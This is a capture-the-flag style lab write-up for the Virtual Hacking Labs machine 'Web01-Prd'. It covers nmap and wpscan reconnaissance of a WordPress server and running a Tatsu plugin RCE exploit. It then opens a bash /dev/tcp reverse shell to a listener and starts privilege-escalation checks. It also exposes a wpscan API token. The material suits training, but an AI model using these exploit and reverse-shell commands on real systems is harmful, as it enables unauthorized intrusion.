WriteupsVHL — Web01-Prd
WebEasyLinux
VHL — Web01-Prd
Production web server with anonymous FTP access. Weak credentials and misconfigured permissions lead to full compromise.
February 9, 2025Virtual Hacking Labs
#FTP#Anonymous Login#Misconfiguration#Apache
nmap
sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.7
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-09 02:28 EST
Nmap scan report for 10.11.1.7
Host is up (0.019s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 0 0 6 Jun 09 2021 pub
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:172.16.1.3
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 b0:9f:8f:4a:9c:33:41:3c:aa:be:19:be:fb:fd:52:a7 (RSA)
| 256 4f:09:f4:c7:95:ae:3d:d3:3b:6d:82:fa:36:bb:d8:d0 (ECDSA)
|_ 256 92:34:16:5a:0e:67:fe:a4:2c:de:5d:76:bf:59:94:fe (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/7.4.29)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/7.4.29
|_http-title: Lab Web Development – A strategic approach to website de...
|_http-generator: WordPress 6.0
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
|_ 100000 3,4 111/udp6 rpcbind
631/tcp open ipp CUPS 1.6
|_http-title: Forbidden - CUPS v1.6.3
|_http-server-header: CUPS/1.6 IPP/2.1
3306/tcp open mysql MariaDB (unauthorized)
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.4
OS details: Linux 4.4
Network Distance: 2 hops
Service Info: OS: Unix
TRACEROUTE
HOP RTT ADDRESS
1 19.17 ms 10.11.1.7
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.25 seconds21
sh
21/tcp open ftp vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 0 0 6 Jun 09 2021 pub
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:172.16.1.3
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status80
sh
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/7.4.29)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/7.4.29
|_http-title: Lab Web Development – A strategic approach to website de...
|_http-generator: WordPress 6.0wpscan
sh
sudo wpscan -e ap,u --plugins-detection aggressive -t 500 --url http://10.11.1.7/ --api-token ZHnKbWjJuwEa5eShsBKgO7DzUr6lm2vehjiBnrspAQo
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.25
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://10.11.1.7/ [10.11.1.7]
[+] Started: Sun Feb 9 02:32:43 2025
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache/2.4.6 (CentOS) PHP/7.4.29
| - X-Powered-By: PHP/7.4.29
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://10.11.1.7/xmlrpc.php
| Found By: Link Tag (Passive Detection)
| Confidence: 100%
| Confirmed By: Direct Access (Aggressive Detection), 100% confidence
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://10.11.1.7/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] Upload directory has listing enabled: http://10.11.1.7/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://10.11.1.7/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 6.0 identified (Insecure, released on 2022-05-24).
| Found By: Rss Generator (Passive Detection)
| - http://10.11.1.7/index.php/feed/, <generator>https://wordpress.org/?v=6.0</generator>
| - http://10.11.1.7/index.php/comments/feed/, <generator>https://wordpress.org/?v=6.0</generator>
|
| [!] 33 vulnerabilities identified:
|
| [!] Title: WP < 6.0.2 - Reflected Cross-Site Scripting
| Fixed in: 6.0.2
| References:
| - https://wpscan.com/vulnerability/622893b0-c2c4-4ee7-9fa1-4cecef6e36be
| - https://wordpress.org/news/2022/08/wordpress-6-0-2-security-and-maintenance-release/
|
| [!] Title: WP < 6.0.2 - Authenticated Stored Cross-Site Scripting
| Fixed in: 6.0.2
| References:
| - https://wpscan.com/vulnerability/3b1573d4-06b4-442b-bad5-872753118ee0
| - https://wordpress.org/news/2022/08/wordpress-6-0-2-security-and-maintenance-release/
|
| [!] Title: WP < 6.0.2 - SQLi via Link API
| Fixed in: 6.0.2
| References:
| - https://wpscan.com/vulnerability/601b0bf9-fed2-4675-aec7-fed3156a022f
| - https://wordpress.org/news/2022/08/wordpress-6-0-2-security-and-maintenance-release/
|
| [!] Title: WP < 6.0.3 - Stored XSS via wp-mail.php
| Fixed in: 6.0.3
| References:
| - https://wpscan.com/vulnerability/713bdc8b-ab7c-46d7-9847-305344a579c4
| - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
| - https://github.com/WordPress/wordpress-develop/commit/abf236fdaf94455e7bc6e30980cf70401003e283
|
| [!] Title: WP < 6.0.3 - Open Redirect via wp_nonce_ays
| Fixed in: 6.0.3
| References:
| - https://wpscan.com/vulnerability/926cd097-b36f-4d26-9c51-0dfab11c301b
| - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
| - https://github.com/WordPress/wordpress-develop/commit/506eee125953deb658307bb3005417cb83f32095
|
| [!] Title: WP < 6.0.3 - Email Address Disclosure via wp-mail.php
| Fixed in: 6.0.3
| References:
| - https://wpscan.com/vulnerability/c5675b59-4b1d-4f64-9876-068e05145431
| - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
| - https://github.com/WordPress/wordpress-develop/commit/5fcdee1b4d72f1150b7b762ef5fb39ab288c8d44
|
| [!] Title: WP < 6.0.3 - Reflected XSS via SQLi in Media Library
| Fixed in: 6.0.3
| References:
| - https://wpscan.com/vulnerability/cfd8b50d-16aa-4319-9c2d-b227365c2156
| - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
| - https://github.com/WordPress/wordpress-develop/commit/8836d4682264e8030067e07f2f953a0f66cb76cc
|
| [!] Title: WP < 6.0.3 - CSRF in wp-trackback.php
| Fixed in: 6.0.3
| References:
| - https://wpscan.com/vulnerability/b60a6557-ae78-465c-95bc-a78cf74a6dd0
| - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
| - https://github.com/WordPress/wordpress-develop/commit/a4f9ca17fae0b7d97ff807a3c234cf219810fae0
|
| [!] Title: WP < 6.0.3 - Stored XSS via the Customizer
| Fixed in: 6.0.3
| References:
| - https://wpscan.com/vulnerability/2787684c-aaef-4171-95b4-ee5048c74218
| - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
| - https://github.com/WordPress/wordpress-develop/commit/2ca28e49fc489a9bb3c9c9c0d8907a033fe056ef
|
| [!] Title: WP < 6.0.3 - Stored XSS via Comment Editing
| Fixed in: 6.0.3
| References:
| - https://wpscan.com/vulnerability/02d76d8e-9558-41a5-bdb6-3957dc31563b
| - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
| - https://github.com/WordPress/wordpress-develop/commit/89c8f7919460c31c0f259453b4ffb63fde9fa955
|
| [!] Title: WP < 6.0.3 - Content from Multipart Emails Leaked
| Fixed in: 6.0.3
| References:
| - https://wpscan.com/vulnerability/3f707e05-25f0-4566-88ed-d8d0aff3a872
| - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
| - https://github.com/WordPress/wordpress-develop/commit/3765886b4903b319764490d4ad5905bc5c310ef8
|
| [!] Title: WP < 6.0.3 - SQLi in WP_Date_Query
| Fixed in: 6.0.3
| References:
| - https://wpscan.com/vulnerability/1da03338-557f-4cb6-9a65-3379df4cce47
| - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
| - https://github.com/WordPress/wordpress-develop/commit/d815d2e8b2a7c2be6694b49276ba3eee5166c21f
|
| [!] Title: WP < 6.0.3 - Stored XSS via RSS Widget
| Fixed in: 6.0.3
| References:
| - https://wpscan.com/vulnerability/58d131f5-f376-4679-b604-2b888de71c5b
| - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
| - https://github.com/WordPress/wordpress-develop/commit/929cf3cb9580636f1ae3fe944b8faf8cca420492
|
| [!] Title: WP < 6.0.3 - Data Exposure via REST Terms/Tags Endpoint
| Fixed in: 6.0.3
| References:
| - https://wpscan.com/vulnerability/b27a8711-a0c0-4996-bd6a-01734702913e
| - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
| - https://github.com/WordPress/wordpress-develop/commit/ebaac57a9ac0174485c65de3d32ea56de2330d8e
|
| [!] Title: WP < 6.0.3 - Multiple Stored XSS via Gutenberg
| Fixed in: 6.0.3
| References:
| - https://wpscan.com/vulnerability/f513c8f6-2e1c-45ae-8a58-36b6518e2aa9
| - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
| - https://github.com/WordPress/gutenberg/pull/45045/files
|
| [!] Title: WP <= 6.2 - Unauthenticated Blind SSRF via DNS Rebinding
| References:
| - https://wpscan.com/vulnerability/c8814e6e-78b3-4f63-a1d3-6906a84c1f11
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3590
| - https://blog.sonarsource.com/wordpress-core-unauthenticated-blind-ssrf/
|
| [!] Title: WP < 6.2.1 - Directory Traversal via Translation Files
| Fixed in: 6.0.4
| References:
| - https://wpscan.com/vulnerability/2999613a-b8c8-4ec0-9164-5dfe63adf6e6
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2745
| - https://wordpress.org/news/2023/05/wordpress-6-2-1-maintenance-security-release/
|
| [!] Title: WP < 6.2.1 - Thumbnail Image Update via CSRF
| Fixed in: 6.0.4
| References:
| - https://wpscan.com/vulnerability/a03d744a-9839-4167-a356-3e7da0f1d532
| - https://wordpress.org/news/2023/05/wordpress-6-2-1-maintenance-security-release/
|
| [!] Title: WP < 6.2.1 - Contributor+ Stored XSS via Open Embed Auto Discovery
| Fixed in: 6.0.4
| References:
| - https://wpscan.com/vulnerability/3b574451-2852-4789-bc19-d5cc39948db5
| - https://wordpress.org/news/2023/05/wordpress-6-2-1-maintenance-security-release/
|
| [!] Title: WP < 6.2.2 - Shortcode Execution in User Generated Data
| Fixed in: 6.0.5
| References:
| - https://wpscan.com/vulnerability/ef289d46-ea83-4fa5-b003-0352c690fd89
| - https://wordpress.org/news/2023/05/wordpress-6-2-1-maintenance-security-release/
| - https://wordpress.org/news/2023/05/wordpress-6-2-2-security-release/
|
| [!] Title: WP < 6.2.1 - Contributor+ Content Injection
| Fixed in: 6.0.4
| References:
| - https://wpscan.com/vulnerability/1527ebdb-18bc-4f9d-9c20-8d729a628670
| - https://wordpress.org/news/2023/05/wordpress-6-2-1-maintenance-security-release/
|
| [!] Title: WP 5.6-6.3.1 - Contributor+ Stored XSS via Navigation Block
| Fixed in: 6.0.6
| References:
| - https://wpscan.com/vulnerability/cd130bb3-8d04-4375-a89a-883af131ed3a
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38000
| - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
|
| [!] Title: WP 5.6-6.3.1 - Reflected XSS via Application Password Requests
| Fixed in: 6.0.6
| References:
| - https://wpscan.com/vulnerability/da1419cc-d821-42d6-b648-bdb3c70d91f2
| - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
|
| [!] Title: WP < 6.3.2 - Denial of Service via Cache Poisoning
| Fixed in: 6.0.6
| References:
| - https://wpscan.com/vulnerability/6d80e09d-34d5-4fda-81cb-e703d0e56e4f
| - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
|
| [!] Title: WP < 6.3.2 - Subscriber+ Arbitrary Shortcode Execution
| Fixed in: 6.0.6
| References:
| - https://wpscan.com/vulnerability/3615aea0-90aa-4f9a-9792-078a90af7f59
| - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
|
| [!] Title: WP < 6.3.2 - Contributor+ Comment Disclosure
| Fixed in: 6.0.6
| References:
| - https://wpscan.com/vulnerability/d35b2a3d-9b41-4b4f-8e87-1b8ccb370b9f
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39999
| - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
|
| [!] Title: WP < 6.3.2 - Unauthenticated Post Author Email Disclosure
| Fixed in: 6.0.6
| References:
| - https://wpscan.com/vulnerability/19380917-4c27-4095-abf1-eba6f913b441
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5561
| - https://wpscan.com/blog/email-leak-oracle-vulnerability-addressed-in-wordpress-6-3-2/
| - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
|
| [!] Title: WordPress < 6.4.3 - Deserialization of Untrusted Data
| Fixed in: 6.0.7
| References:
| - https://wpscan.com/vulnerability/5e9804e5-bbd4-4836-a5f0-b4388cc39225
| - https://wordpress.org/news/2024/01/wordpress-6-4-3-maintenance-and-security-release/
|
| [!] Title: WordPress < 6.4.3 - Admin+ PHP File Upload
| Fixed in: 6.0.7
| References:
| - https://wpscan.com/vulnerability/a8e12fbe-c70b-4078-9015-cf57a05bdd4a
| - https://wordpress.org/news/2024/01/wordpress-6-4-3-maintenance-and-security-release/
|
| [!] Title: WP < 6.5.2 - Unauthenticated Stored XSS
| Fixed in: 6.0.8
| References:
| - https://wpscan.com/vulnerability/1a5c5df1-57ee-4190-a336-b0266962078f
| - https://wordpress.org/news/2024/04/wordpress-6-5-2-maintenance-and-security-release/
|
| [!] Title: WordPress < 6.5.5 - Contributor+ Stored XSS in HTML API
| Fixed in: 6.0.9
| References:
| - https://wpscan.com/vulnerability/2c63f136-4c1f-4093-9a8c-5e51f19eae28
| - https://wordpress.org/news/2024/06/wordpress-6-5-5/
|
| [!] Title: WordPress < 6.5.5 - Contributor+ Stored XSS in Template-Part Block
| Fixed in: 6.0.9
| References:
| - https://wpscan.com/vulnerability/7c448f6d-4531-4757-bff0-be9e3220bbbb
| - https://wordpress.org/news/2024/06/wordpress-6-5-5/
|
| [!] Title: WordPress < 6.5.5 - Contributor+ Path Traversal in Template-Part Block
| Fixed in: 6.0.9
| References:
| - https://wpscan.com/vulnerability/36232787-754a-4234-83d6-6ded5e80251c
| - https://wordpress.org/news/2024/06/wordpress-6-5-5/
[+] WordPress theme in use: thbusiness
| Location: http://10.11.1.7/wp-content/themes/thbusiness/
| Latest Version: 2.0.7 (up to date)
| Last Updated: 2019-01-21T00:00:00.000Z
| Readme: http://10.11.1.7/wp-content/themes/thbusiness/readme.txt
| Style URL: http://10.11.1.7/wp-content/themes/thbusiness/style.css?ver=6.0
| Style Name: THBusiness
| Style URI: http://www.themezhut.com/themes/thbusiness
| Description: THBusiness WordPress Theme is mainly focused for business websites while it consists with a simple e...
| Author: ThemezHut
| Author URI: http://www.themezhut.com
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 2.0.7 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.11.1.7/wp-content/themes/thbusiness/style.css?ver=6.0, Match: 'Version: 2.0.7'
[+] Enumerating All Plugins (via Aggressive Methods)
Checking Known Locations - Time: 00:01:43 <=========================================================> (108967 / 108967) 100.00% Time: 00:01:43
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] advanced-uploader
| Location: http://10.11.1.7/wp-content/plugins/advanced-uploader/
| Latest Version: 4.2 (up to date)
| Last Updated: 2021-03-01T11:13:00.000Z
| Readme: http://10.11.1.7/wp-content/plugins/advanced-uploader/readme.txt
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - http://10.11.1.7/wp-content/plugins/advanced-uploader/, status: 200
|
| [!] 1 vulnerability identified:
|
| [!] Title: Advanced Uploader <= 4.2 - Subscriber+ Arbitrary File Upload
| References:
| - https://wpscan.com/vulnerability/9ddeef95-7c7f-4296-a55b-fd3304c91c18
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1103
|
| Version: 4.2 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://10.11.1.7/wp-content/plugins/advanced-uploader/readme.txt
[+] akismet
| Location: http://10.11.1.7/wp-content/plugins/akismet/
| Last Updated: 2025-02-04T21:01:00.000Z
| Readme: http://10.11.1.7/wp-content/plugins/akismet/readme.txt
| [!] The version is out of date, the latest version is 5.3.6
|
| Found By: Known Locations (Aggressive Detection)
| - http://10.11.1.7/wp-content/plugins/akismet/, status: 200
|
| Version: 4.2.4 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://10.11.1.7/wp-content/plugins/akismet/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://10.11.1.7/wp-content/plugins/akismet/readme.txt
[+] perfect-survey
| Location: http://10.11.1.7/wp-content/plugins/perfect-survey/
| Latest Version: 1.5.1 (up to date)
| Last Updated: 2021-06-11T12:09:00.000Z
| Readme: http://10.11.1.7/wp-content/plugins/perfect-survey/readme.txt
|
| Found By: Known Locations (Aggressive Detection)
| - http://10.11.1.7/wp-content/plugins/perfect-survey/, status: 200
|
| [!] 4 vulnerabilities identified:
|
| [!] Title: Perfect Survey < 1.5.2 - Unauthorised AJAX Call to Stored XSS / Survey Settings Update
| Fixed in: 1.5.2
| References:
| - https://wpscan.com/vulnerability/c73c7694-1cee-4f26-a425-9c336adce52b
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24763
|
| [!] Title: Perfect Survey < 1.5.2 - Unauthenticated SQL Injection
| Fixed in: 1.5.2
| References:
| - https://wpscan.com/vulnerability/c1620905-7c31-4e62-80f5-1d9635be11ad
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24762
|
| [!] Title: Perfect Survey < 1.5.2 - Reflected Cross-Site Scripting
| Fixed in: 1.5.2
| References:
| - https://wpscan.com/vulnerability/c2f8e9b9-c044-4c45-8d17-e628e9cb5d59
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24764
|
| [!] Title: Perfect Survey < 1.5.2 - Unauthenticated Stored Cross-Site Scripting
| References:
| - https://wpscan.com/vulnerability/4440e7ca-1a55-444d-8f6c-04153302d750
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24765
|
| Version: 1.5.1 (100% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://10.11.1.7/wp-content/plugins/perfect-survey/readme.txt
| Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
| - http://10.11.1.7/wp-content/plugins/perfect-survey/readme.txt
[+] tatsu
| Location: http://10.11.1.7/wp-content/plugins/tatsu/
| Readme: http://10.11.1.7/wp-content/plugins/tatsu/README.txt
|
| Found By: Known Locations (Aggressive Detection)
| - http://10.11.1.7/wp-content/plugins/tatsu/, status: 200
|
| Version: 4.3 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://10.11.1.7/wp-content/plugins/tatsu/README.txt
[+] wpdiscuz
| Location: http://10.11.1.7/wp-content/plugins/wpdiscuz/
| Last Updated: 2024-10-14T17:02:00.000Z
| Readme: http://10.11.1.7/wp-content/plugins/wpdiscuz/readme.txt
| [!] The version is out of date, the latest version is 7.6.27
|
| Found By: Known Locations (Aggressive Detection)
| - http://10.11.1.7/wp-content/plugins/wpdiscuz/, status: 200
|
| [!] 19 vulnerabilities identified:
|
| [!] Title: Comments - wpDiscuz 7.0.0 - 7.0.4 - Unauthenticated Arbitrary File Upload
| Fixed in: 7.0.5
| References:
| - https://wpscan.com/vulnerability/92ae2765-dac8-49dc-a361-99c799573e61
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24186
| - https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/
| - https://plugins.trac.wordpress.org/changeset/2345429/wpdiscuz
|
| [!] Title: Comments - wpDiscuz < 7.3.2 - Admin+ Stored Cross-Site Scripting
| Fixed in: 7.3.2
| References:
| - https://wpscan.com/vulnerability/f51a350c-c46d-4d52-b787-762283625d0b
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24737
|
| [!] Title: wpDiscuz < 7.3.4 - Arbitrary Comment Addition/Edition/Deletion via CSRF
| Fixed in: 7.3.4
| References:
| - https://wpscan.com/vulnerability/2746101e-e993-42b9-bd6f-dfd5544fa3fe
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-24806
| - https://www.youtube.com/watch?v=CL7Bttu2W-o
|
| [!] Title: wpDiscuz < 7.3.12 - Sensitive Information Disclosure
| Fixed in: 7.3.12
| References:
| - https://wpscan.com/vulnerability/027e6ef8-39d8-4fa9-957f-f53ee7175c0a
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23984
|
| [!] Title: wpDiscuz < 7.6.4 - Unauthenticated Data Modification via IDOR
| Fixed in: 7.6.4
| References:
| - https://wpscan.com/vulnerability/d7de195a-a932-43dd-bbb4-784a19324b04
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3869
|
| [!] Title: wpDiscuz < 7.6.4 - Post Rating Increase/Decrease iva IDOR
| Fixed in: 7.6.4
| References:
| - https://wpscan.com/vulnerability/051ab8b8-210e-48ac-82e7-7c4a0aa2ecd5
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3998
|
| [!] Title: wpDiscuz < 7.6.12 - Unauthenticated Stored XSS
| Fixed in: 7.6.12
| References:
| - https://wpscan.com/vulnerability/f061ffa4-25f2-4ad5-9edb-6cb2c7b678d1
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-47185
|
| [!] Title: wpDiscuz < 7.6.6 - Unauthenticated SQL Injection
| Fixed in: 7.6.6
| Reference: https://wpscan.com/vulnerability/ebb5ed9a-4fb2-4d64-a8f2-6957878a4599
|
| [!] Title: wpDiscuz < 7.6.4 - Author+ IDOR
| Fixed in: 7.6.4
| References:
| - https://wpscan.com/vulnerability/d5e677ef-786f-4921-97d9-cbf0c2e21df9
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46311
|
| [!] Title: wpDiscuz < 7.6.11 - Unauthenticated Content Injection
| Fixed in: 7.6.11
| References:
| - https://wpscan.com/vulnerability/8c8cabee-285a-408f-9449-7bb545c07cdc
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46310
|
| [!] Title: wpDiscuz < 7.6.11 - Insufficient Authorization to Comment Submission on Deleted Posts
| Fixed in: 7.6.11
| References:
| - https://wpscan.com/vulnerability/874679f2-bf44-4c11-bc3b-69ae5ac59ced
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46309
|
| [!] Title: wpDiscuz < 7.6.12 - Missing Authorization in AJAX Actions
| Fixed in: 7.6.12
| References:
| - https://wpscan.com/vulnerability/2e121d4f-7fdf-428c-8251-a586cbd31a96
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-45760
|
| [!] Title: wpDiscuz < 7.6.12 - Cross-Site Request Forgery
| Fixed in: 7.6.12
| References:
| - https://wpscan.com/vulnerability/f8dfcc13-187c-4a83-a87e-761c0db4b6d9
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-47775
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/53af9dfd-eb2d-4f6f-b02f-daf790b95f1f
|
| [!] Title: wpDiscuz < 7.6.6 - Unauthenticated SQL Injection
| Fixed in: 7.6.6
| References:
| - https://wpscan.com/vulnerability/a2fec175-40f6-4a80-84ed-5b88251584de
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/9dd1e52c-83b7-4b3e-a791-a2c0ccd856bc
|
| [!] Title: wpDiscuz < 7.6.13 - Admin+ Stored XSS
| Fixed in: 7.6.13
| References:
| - https://wpscan.com/vulnerability/79aed6a7-a6e2-4429-8f98-ccac6b59fb4d
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-51691
| - https://patchstack.com/database/vulnerability/wpdiscuz/wordpress-wpdiscuz-plugin-7-6-12-cross-site-scripting-xss-vulnerability
|
| [!] Title: wpDiscuz < 7.6.16 - Authenticated (Author+) Stored Cross-Site Scripting via Uploaded Image Alternative Text
| Fixed in: 7.6.16
| References:
| - https://wpscan.com/vulnerability/f3a337ae-54e5-41ca-a0d9-60745b568469
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-2477
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/3eddc03d-ecff-4b50-a574-7b6b62e53af0
|
| [!] Title: Comments – wpDiscuz < 7.6.19 - Authenticated (Contributor+) Stored Cross-Site Scripting
| Fixed in: 7.6.19
| References:
| - https://wpscan.com/vulnerability/607da7a6-c2f2-4a9e-9471-8e0d29f355d9
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-35681
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/005bf2f0-892f-4248-afe3-263ae3d2ac54
|
| [!] Title: Comments – wpDiscuz < 7.6.22 - Unauthenticated HTML Injection
| Fixed in: 7.6.22
| References:
| - https://wpscan.com/vulnerability/66542876-77ae-442d-acde-2aac642f1d36
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-6704
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/fa3501a4-7975-4f90-8037-f8a06c293c07
|
| [!] Title: Comments – wpDiscuz < 7.6.25 - Authentication Bypass
| Fixed in: 7.6.25
| References:
| - https://wpscan.com/vulnerability/b95d9907-2c2d-4187-b902-d67262ea6b6d
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-9488
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/b71706a7-e101-4d50-a2da-1aeeaf07cf4b
|
| Version: 7.0.4 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://10.11.1.7/wp-content/plugins/wpdiscuz/readme.txt
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:05 <=================================================================> (10 / 10) 100.00% Time: 00:00:05
[i] User(s) Identified:
[+] web01
| Found By: Wp Json Api (Aggressive Detection)
| - http://10.11.1.7/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
[+] WPScan DB API OK
| Plan: free
| Requests Done (during the scan): 7
| Requests Remaining: 18
[+] Finished: Sun Feb 9 02:34:44 2025
[+] Requests Done: 109050
[+] Cached Requests: 18
[+] Data Sent: 33.03 MB
[+] Data Received: 15.941 MB
[+] Memory used: 471.207 MB
[+] Elapsed time: 00:02:01tatsu plugin
- https://wpscan.com/vulnerability/fb0097a0-5d7b-4e5b-97de-aacafa8fffcd/
sh
python3 tatsu_exploit.py http://10.11.1.7 whoami
|=== Tatsudo: pre-auth RCE exploit for Tatsu wordpress plugin <= 3.3.8
|=== CVE-2021-XXX / Vincent MICHEL (@darkpills)
[+] Generating a zip with shell technique 'php'
[+] Uploading zip archive to http://10.11.1.7/wp-admin/admin-ajax.php?action=add_custom_font
[+] Upload OK
[+] Trigger shell at http://10.11.1.7/wp-content/uploads/typehub/custom/whp/.rnsti.php
[+] Exploit success!
apache
[+] Shell file has been auto-deleted but parent directory will remain on the webserver
[+] Job donereverse shell
sh
python3 tatsu_exploit.py http://10.11.1.7 'bash -i >& /dev/tcp/172.16.1.1/1234 0>&1'sh
nc -lnvp 1234
listening on [any] 1234 ...
connect to [172.16.1.1] from (UNKNOWN) [10.11.1.7] 56348
bash: no job control in this shell
bash-4.2$ whoami
whoami
apachesh
python -c 'import pty; pty.spawn("/bin/bash")'priv esc
sh
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
strace Not Found
